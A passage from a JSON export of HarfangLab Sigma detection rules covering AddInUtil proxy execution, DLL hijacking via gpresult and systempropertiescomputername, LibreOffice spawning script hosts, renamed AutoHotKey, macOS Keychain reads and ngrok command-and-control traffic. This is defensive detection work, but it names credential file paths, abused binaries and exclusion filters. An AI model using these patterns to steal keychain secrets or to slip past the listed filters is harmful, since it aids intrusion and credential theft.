"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.002",
"attack.t1048.003",
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59d4b297-7e16-4785-93bf-77aa4203d81b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085337Z",
"creation_date": "2026-03-23T11:45:34.085339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085343Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_suspicious_addinutil_child_process.yml",
"content": "title: Suspicious Process Spawned by AddInutil.exe\nid: 59d4b297-7e16-4785-93bf-77aa4203d81b\ndescription: |\n Detects an unusual process spawned by the Add-In deployment cache updating utility (AddInutil.exe).\n Adversaries can use this utility to proxy the execution of malicious code, in an attempt to evade defenses.\n It is recommended to investigate the process spawned by AddInutil.exe and other potentially malicious activities on the machine.\nreferences:\n - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/10/27\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.AddInutil\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessParentOriginalFileName: 'AddInUtil.exe'\n\n exclusion_conhost_1:\n OriginalFileName: 'conhost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_conhost_2:\n OriginalFileName: 'conhost.exe'\n CommandLine: '\\\\?\\?\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1'\n\n exclusion_werfault:\n OriginalFileName: 'werfault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_dw20:\n Image: '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\dw20.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59d4b297-7e16-4785-93bf-77aa4203d81b",
"rule_name": "Suspicious Process Spawned by AddInutil.exe",
"rule_description": "Detects an unusual process spawned by the Add-In deployment cache updating utility (AddInutil.exe).\nAdversaries can use this utility to proxy the execution of malicious code, in an attempt to evade defenses.\nIt is recommended to investigate the process spawned by AddInutil.exe and other potentially malicious activities on the machine.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59d8e544-4173-4f01-8db4-a19927dc54d0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091038Z",
"creation_date": "2026-03-23T11:45:34.091040Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091044Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiescomputername.yml",
"content": "title: DLL Hijacking via systempropertiescomputername.exe\nid: 59d8e544-4173-4f01-8db4-a19927dc54d0\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiescomputername.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiescomputername.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59d8e544-4173-4f01-8db4-a19927dc54d0",
"rule_name": "DLL Hijacking via systempropertiescomputername.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiescomputername.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a4a2c76-7d1f-47d1-8b34-2294c67ad00e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595372Z",
"creation_date": "2026-03-23T11:45:34.595375Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595383Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1566/"
],
"name": "t1204_002_libreoffice_application_spawning_malicious_processes.yml",
"content": "title: Dangerous Process Started by LibreOffice Application\nid: 5a4a2c76-7d1f-47d1-8b34-2294c67ad00e\ndescription: |\n Detects various potentially malicious binaries started from LibreOffice applications.\n Attackers heavily use phishing attacks to gain access to a victim's system, and they often result in the execution of code by application reading the infected documents.\n It is recommended to investigate actions taken by the started process, as well as the opened document by LibreOffice at the time of detection.\nreferences:\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1566/\ndate: 2022/07/04\nmodified: 2025/04/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - attack.initial_access\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent:\n ParentImage|endswith: '\\soffice.bin'\n\n selection_image:\n - Image|endswith:\n # cmd + scripts\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n # persistence\n - '\\schtasks.exe'\n - '\\regsvr32.exe' # lolbas squiblydoo\n - '\\wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - '\\mshta.exe'\n - '\\rundll32.exe'\n - '\\msiexec.exe'\n - '\\msbuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - '\\AppVLP.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe'\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe'\n - 'appvlp.exe'\n\n exclusion_hp:\n CommandLine|contains: '?:\\windows\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn???.dll'\n\n exclusion_ver:\n CommandLine:\n - '?:\\windows\\system32\\cmd.exe /c ver'\n - '?:\\windows\\system32\\cmd.exe /c cmd /c ver'\n - '?:\\windows\\system32\\cmd.exe /c command /c ver'\n\n exclusion_tex:\n CommandLine|contains|all: 'AppData\\Roaming\\LibreOffice\\\\*\\user\\TexMaths\\'\n\n exclusion_ndfapi:\n CommandLine: '?:\\WINDOWS\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing ?:\\Users\\\\*\\AppData\\Local\\Temp\\NDF*.tmp'\n\n exclusion_wmic:\n CommandLine:\n - 'cmd /C WMIC bios get serialnumber'\n - 'cmd /C WMIC computersystem get manufacturer'\n - 'cmd /C WMIC computersystem get model'\n - 'cmd /C WMIC computersystem get TotalPhysicalMemory'\n - 'cmd /C WMIC cpu get DeviceID'\n - 'cmd /C WMIC cpu get manufacturer'\n - 'cmd /C WMIC cpu get MaxClockSpeed'\n - 'cmd /C WMIC cpu get Name'\n - 'cmd /C WMIC cpu get NumberOfCores'\n - 'cmd /C WMIC cpu get NumberOfLogicalProcessors'\n\n exclusion_officeaddin:\n CommandLine:\n - 'regsvr32 /s /n /i:OnPrinterAccess ?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\UDCOfficeAddin*.dll'\n - 'regsvr32 /s /n /i ?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\UDCOfficeAddin*x64.dll'\n\n exclusion_rundll32:\n CommandLine|contains:\n - 'rundll32.exe ?:\\Program Files\\'\n - 'rundll32.exe ?:\\Program Files (x86)\\'\n - 'rundll32.exe ?:\\Windows\\system32\\url.dll,MailToProtocolHandler mailto:'\n - 'runDll32.exe ?:\\Windows\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification'\n - 'rundll32.exe ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\X64\\\\*\\\\*.DLL'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a4a2c76-7d1f-47d1-8b34-2294c67ad00e",
"rule_name": "Dangerous Process Started by LibreOffice Application",
"rule_description": "Detects various potentially malicious binaries started from LibreOffice applications.\nAttackers heavily use phishing attacks to gain access to a victim's system, and they often result in the execution of code by application reading the infected documents.\nIt is recommended to investigate actions taken by the started process, as well as the opened document by LibreOffice at the time of detection.\n",
"rule_creation_date": "2022-07-04",
"rule_modified_date": "2025-04-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a4a7014-732a-4c1b-ab75-89991844df42",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080461Z",
"creation_date": "2026-03-23T11:45:34.080463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080467Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_suspicious_renamed_autohotkey_binary.yml",
"content": "title: Suspicious Renamed AutoHotKey Binary\nid: 5a4a7014-732a-4c1b-ab75-89991844df42\ndescription: |\n Detects the execution of a renamed AutoHotKey binary.\n Adversaries may execute AutoHotKey scripts in order to conduct malicious operations and deliver more advanced malware.\n It is recommended to check the content of the executed script which is passed on the command-line for malicious purposes.\nreferences:\n - https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2024/03/22\nmodified: 2025/07/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AutoHotkey\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - OriginalFileName: 'AutoHotKey.exe'\n - Product|contains: 'AutoHotkey'\n\n filter_name:\n Image|endswith:\n - '\\AutoHotkey.exe'\n - '\\AutoHotkey-windows-*.exe'\n - '\\AutoHotkeyA32.exe'\n - '\\AutoHotkeyU32.exe'\n - '\\AutoHotkeyU64.exe'\n - '\\AutoHotkey32.exe'\n - '\\AutoHotkey64.exe'\n - '\\AutoHotkey32_UIA.exe'\n - '\\AutoHotkey64_UIA.exe'\n - '\\AutoHotkeyU32_UIA.exe'\n - '\\AutoHotkeyU64_UIA.exe'\n - '\\AutoHotkey_*_setup*.exe' # AutoHotkey_2.0.11_setup.exe\n - '\\AutoHotkey *.exe' # AutoHotkey 1.1.37.02.exe\n - '\\\\*-AutoHotkey_*_setup.exe'\n - '\\AutoHotkeyUX.exe'\n - '\\AutoHotFlow.exe'\n - '\\AutoHotkeyLKL.exe'\n - '\\lintalist.exe'\n - '\\LLM AutoHotkey Assistant.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a4a7014-732a-4c1b-ab75-89991844df42",
"rule_name": "Suspicious Renamed AutoHotKey Binary",
"rule_description": "Detects the execution of a renamed AutoHotKey binary.\nAdversaries may execute AutoHotKey scripts in order to conduct malicious operations and deliver more advanced malware.\nIt is recommended to check the content of the executed script which is passed on the command-line for malicious purposes.\n",
"rule_creation_date": "2024-03-22",
"rule_modified_date": "2025-07-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a7758ea-0069-4dd5-9f5d-4d478a464ae5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094030Z",
"creation_date": "2026-03-23T11:45:34.094032Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094036Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_system_keychain_access_suspicious_process_macos.yml",
"content": "title: Suspicious Access to System Keychain\nid: 5a7758ea-0069-4dd5-9f5d-4d478a464ae5\ndescription: |\n Detects a suspicious access to the system Keychain files.\n Adversaries may access Keychain (or Keychain Services) to acquire sensitive information such as account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2024/09/26\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_common_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_common_files:\n Kind: 'read'\n Path:\n - '/Library/Keychains/*.keychain'\n - '/Library/Keychains/*.keychain-db'\n - '/private/var/*/Library/Keychains/*.keychain'\n - '/private/var/*/Library/Keychains/*.keychain-db'\n - '/Network/Library/Keychains/*.keychain'\n - '/Network/Library/Keychains/*.keychain-db'\n ProcessImage|contains: '?'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/usr/local/bin/'\n # process\n - '/osascript'\n\n selection_susp_process:\n ProcessImage: '/bin/cat'\n\n filter_security:\n ProcessImage: '/usr/bin/security'\n\n filter_ldapsearch:\n ProcessImage: '/usr/bin/ldapsearch'\n\n filter_codesign:\n ProcessImage: '/usr/bin/codesign'\n\n exclusion_process_pkinstall:\n - ProcessAncestors|contains: '/private/tmp/PKInstallSandbox.??????/Scripts/'\n - ProcessImage|contains: '/private/tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_process_adobe:\n ProcessAncestors|contains: '/private/tmp/????????-????-????-????-?????????????/Creative Cloud Installer.app/Contents/MacOS/Install'\n\n exclusion_process_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/opt/homebrew/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_folder_signed:\n ProcessImage|startswith: '/users/'\n ProcessSigned: 'true'\n\n adhoc_signed:\n ProcessCodesigningFlagsStr|contains: 'CS_ADHOC'\n\n condition: all of selection_common_* and 1 of selection_susp_* and not 1 of filter_* and not 1 of exclusion_process_* and not (exclusion_folder_signed and not adhoc_signed)\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a7758ea-0069-4dd5-9f5d-4d478a464ae5",
"rule_name": "Suspicious Access to System Keychain",
"rule_description": "Detects a suspicious access to the system Keychain files.\nAdversaries may access Keychain (or Keychain Services) to acquire sensitive information such as account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a871461-061c-41ec-b776-f11c897473f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603773Z",
"creation_date": "2026-03-23T11:45:34.603776Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603783Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf",
"https://ngrok.com/blog-post/new-ngrok-domains",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1102_002_url_access_ngrok.yml",
"content": "title: HTTP request to Ngrok Service\nid: 5a871461-061c-41ec-b776-f11c897473f4\ndescription: |\n Detects an HTTP request to Ngrok's services by utilizing free static domains provided by Ngrok.\n Adversaries may use an existing, legitimate external Web service like Ngrok as a means to sending commands to and receiving output from a compromised system over HTTP channel.\n It is recommended to investigate the process at the origin of the HTTP request to determine whether the communication with Ngrok's services is legitimate.\nreferences:\n - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\n - https://ngrok.com/blog-post/new-ngrok-domains\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2024/04/02\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Tool.Ngrok\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost|endswith:\n - '.ngrok-free.app'\n - '.ngrok-free.dev'\n - '.ngrok.app'\n - '.ngrok.dev'\n - '.ngrok.io'\n\n # https://newtonpaul.com/svchost-analysis-and-internet-sharing-triage/\n exclusion_sharedaccess:\n ProcessCommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s SharedAccess'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a871461-061c-41ec-b776-f11c897473f4",
"rule_name": "HTTP request to Ngrok Service",
"rule_description": "Detects an HTTP request to Ngrok's services by utilizing free static domains provided by Ngrok.\nAdversaries may use an existing, legitimate external Web service like Ngrok as a means to sending commands to and receiving output from a compromised system over HTTP channel.\nIt is recommended to investigate the process at the origin of the HTTP request to determine whether the communication with Ngrok's services is legitimate.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a89c980-2d01-467d-95ed-eaa6c2a7bcd9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597152Z",
"creation_date": "2026-03-23T11:45:34.597157Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597170Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gpresult.yml",
"content": "title: DLL Hijacking via gpresult.exe\nid: 5a89c980-2d01-467d-95ed-eaa6c2a7bcd9\ndescription: |\n Detects potential Windows DLL Hijacking via gpresult.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpresult.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\NTDSAPI.dll'\n - '\\Secur32.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\wbemprox.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - 